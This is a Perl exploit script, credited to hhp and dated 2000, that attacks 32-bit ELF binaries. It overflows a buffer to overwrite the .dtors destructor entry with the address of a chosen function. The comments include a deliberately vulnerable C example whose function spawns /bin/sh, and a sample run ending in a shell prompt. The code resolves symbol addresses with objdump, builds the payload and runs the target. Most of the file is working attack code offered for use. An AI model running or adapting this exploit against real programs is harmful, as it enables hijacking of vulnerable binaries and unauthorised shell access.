#!/usr/bin/perl
#
# Generic ELF .dtors exploit (32-bit targets: the resolved symbol address is appended to the filler as four little-endian bytes).
# 
# Authors: loophole && icesk of hhp via ttysnoop, HEH.
# Date: 12/22/2000.
# www.hhp-programming.net
#
# ------------- Example exploitable program. ---------------------
#
#  /* dtors.c */
#  #include <stdio.h>
#  #include <sys/types.h>
#  int main(int argc,char **v){
#   static u_char buffer[]="doot";
#   sprintf(buffer,"%s",v[1]);
#  }
# 
#  getit(void){
#   printf("%0x overwrote .dtors!\n",&getit);
#   execl("/bin/sh","sh",0);
#  }
#
#-----------------------------------------------------------------
#
# Example exploit execution:
#  dipped:~/dtors$ ./hhp-dtors.pl dtors getit 24
#  Exploiting .dtors address: 08048478...
#  8048478 overwrote .dtors!
#  sh-2.03$
#
#-----------------------------------------------------------------


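use strict;
use warnings;

# Usage: <program> <function()> <bufsize>
#   program  - target binary in the current directory (always run as ./program)
#   function - symbol whose address is written over the .dtors entry
#   bufsize  - number of 'A' filler bytes placed in front of the address
#
# All three arguments are required. The original "... = @ARGV or die" only
# fired on an empty @ARGV, so a missing bufsize silently became 0 filler.
# The builtin is qualified as CORE::die because this script also defines
# its own sub die() for rejected arguments (reached only through &die).
my ($prog, $func, $size) = @ARGV;
@ARGV >= 3 or CORE::die "$0 <program> <function()> <bufsize>";

# Allow-list checks, anchored at both ends and re-assigned from the capture
# (taint-style). No shell is involved below, but the checks still matter:
# the values become argv entries and part of a filesystem path. A leading
# '-' in $prog cannot become an objdump option because it is always
# referenced as ./$prog; $func never reaches another program's argv.
($prog) = $prog =~ /\A([A-Za-z0-9_-]+)\z/ or &die();
($func) = $func =~ /\A([A-Za-z0-9_-]+)\z/ or &die();
($size) = $size =~ /\A([0-9]+)\z/        or &die();   # empty size no longer slips through

# Resolve the symbol with a list-form pipe open (no shell, no grep/awk).
# The symbol name is the last whitespace-separated field of each
# `objdump --syms` line; the original `grep $func` was a substring match
# and could select an unrelated symbol such as "getit2" or "_getit".
open my $syms, '-|', '/usr/bin/objdump', '--syms', "./$prog"
    or CORE::die "cannot run objdump on ./$prog: $!";
my $addr;
while (my $line = <$syms>) {
    my @fields = split ' ', $line;
    next unless @fields >= 2 && $fields[-1] eq $func;
    $addr = $fields[0];
    last;                     # first exact match, as the old pipeline used the first line
}
close $syms;

# A .dtors entry is 4 bytes, so only an 8-hex-digit (32-bit) address is
# usable; a 16-digit address from a 64-bit objdump, or no match at all,
# is rejected here instead of producing an undef/garbage payload.
defined $addr && $addr =~ /\A[0-9a-fA-F]{8}\z/
    or CORE::die "no 32-bit address found for symbol '$func' in ./$prog";

print "Exploiting .dtors address: $addr...\n";

# pack 'V' emits the address as four little-endian bytes, the same order the
# hand-written "\x$4\x$3\x$2\x$1" reversal produced. A NUL byte inside the
# address cannot be carried in an argv string (execve stops at it); that
# limitation applied equally to the old shell-based invocation.
my $payload = ('A' x $size) . pack('V', hex $addr);

# Run the target directly with list-form system(): the raw payload bytes
# reach argv[1] unchanged instead of passing through two shells and a
# nested perl -e, where bytes such as 0x20 or 0x0a would split the argument.
system("./$prog", $payload);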
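# Abort when an argument failed the allow-list check.
# NOTE: this sub deliberately shares its name with the builtin die(); it is
# only reachable as &die, since a bare "die ..." resolves to CORE::die.
# Exits non-zero so a caller or wrapper can distinguish a rejected
# argument from a successful run (the old code exited 0 on rejection).
sub die {
    print "Incorrect characters, possible security breach... Nice Try!\n";
    exit(1);
}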
#eof

